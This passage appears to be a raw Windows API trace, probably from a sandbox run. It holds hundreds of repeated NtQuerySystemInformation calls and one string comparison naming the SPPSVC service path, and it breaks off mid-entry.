[0227.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x50, ResultLength=0x0) [0227.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x50, ResultLength=0x0) [0227.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x50, ResultLength=0x0) [0227.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x28, ResultLength=0x0) [0227.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0227.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0227.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0227.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0227.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0227.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0227.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0227.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x50, ResultLength=0x0) [0227.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x28, ResultLength=0x0) [0227.424] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0227.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x50, ResultLength=0x0) [0227.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x50, ResultLength=0x0) [0227.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x50, ResultLength=0x0) [0227.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0227.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x28, ResultLength=0x0) [0227.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0227.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0227.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0227.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0227.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0227.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0227.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0227.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0227.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x50, ResultLength=0x0) [0227.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x50, ResultLength=0x0) [0227.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x50, ResultLength=0x0) [0227.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x50, ResultLength=0x0) [0227.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x50, ResultLength=0x0) [0227.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x50, ResultLength=0x0) [0227.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x50, ResultLength=0x0) [0227.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce10, Length=0x38, ResultLength=0x0) [0227.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcc40, Length=0x28, ResultLength=0x0) [0227.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcc40, Length=0x28, ResultLength=0x0) [0227.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcc40, Length=0x28, ResultLength=0x0) [0227.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcc40, Length=0x28, ResultLength=0x0) [0227.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fccb0, Length=0x28, ResultLength=0x0) [0227.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce10, Length=0x38, ResultLength=0x0) [0227.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcd30, Length=0x28, ResultLength=0x0) [0227.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcd30, Length=0x28, ResultLength=0x0) [0227.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcbd0, Length=0x20, ResultLength=0x0) [0227.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcb50, Length=0x20, ResultLength=0x0) [0227.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcb50, Length=0x20, ResultLength=0x0) [0227.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcb50, Length=0x20, ResultLength=0x0) [0227.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce10, Length=0x38, ResultLength=0x0) [0227.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce10, Length=0x38, ResultLength=0x0) [0227.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcc90, Length=0x20, ResultLength=0x0) [0227.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcc20, Length=0x20, ResultLength=0x0) [0227.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcc20, Length=0x20, ResultLength=0x0) [0227.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0227.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0227.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0227.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x50, ResultLength=0x0) [0227.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x50, ResultLength=0x0) [0227.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x50, ResultLength=0x0) [0227.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x50, ResultLength=0x0) [0227.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x38, ResultLength=0x0) [0227.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce90, Length=0x28, ResultLength=0x0) [0227.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce90, Length=0x28, ResultLength=0x0) [0227.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce90, Length=0x28, ResultLength=0x0) [0227.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf00, Length=0x28, ResultLength=0x0) [0227.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x38, ResultLength=0x0) [0227.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0227.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0227.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x38, ResultLength=0x0) [0227.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x20, ResultLength=0x0) [0227.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce60, Length=0x20, ResultLength=0x0) [0227.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce60, Length=0x20, ResultLength=0x0) [0227.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce60, Length=0x20, ResultLength=0x0) [0227.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x38, ResultLength=0x0) [0227.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x20, ResultLength=0x0) [0227.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x20, ResultLength=0x0) [0227.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x20, ResultLength=0x0) [0227.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.457] NtQuerySystemInformation 